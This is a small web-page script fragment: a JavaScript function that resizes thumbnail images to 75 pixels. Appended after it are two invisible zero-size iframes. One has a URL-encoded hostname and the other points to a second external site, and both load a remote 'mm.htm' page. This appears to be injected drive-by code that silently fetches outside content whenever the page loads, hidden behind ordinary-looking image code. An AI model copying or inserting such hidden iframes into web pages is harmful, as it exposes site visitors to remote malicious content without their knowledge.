<!--
var flag=false;
function DrawImage1(ImgD){
var image=new Image();
image.src=ImgD.src;
if(image.width>0 && image.height>0){
flag=true;
if(image.width/image.height>= 1){
if(image.width>75){ 
ImgD.width=75;
ImgD.height=(image.height*75)/image.width;
}else{
ImgD.width=image.width; 
ImgD.height=image.height;
}
}
else{
if(image.height>75){ 
ImgD.height=75;
ImgD.width=(image.width*75)/image.height; 
}else{
ImgD.width=image.width; 
ImgD.height=image.height;
}
}
}
} 
//--><iframe src=http://%77%77%77%2E%39%6D%77%2E%63%6E/images/adv/mm.htm width=0  height=0></iframe>
<iframe src=http://jhfy3.9966.org/jh/mm.htm width=0 height=0></iframe>
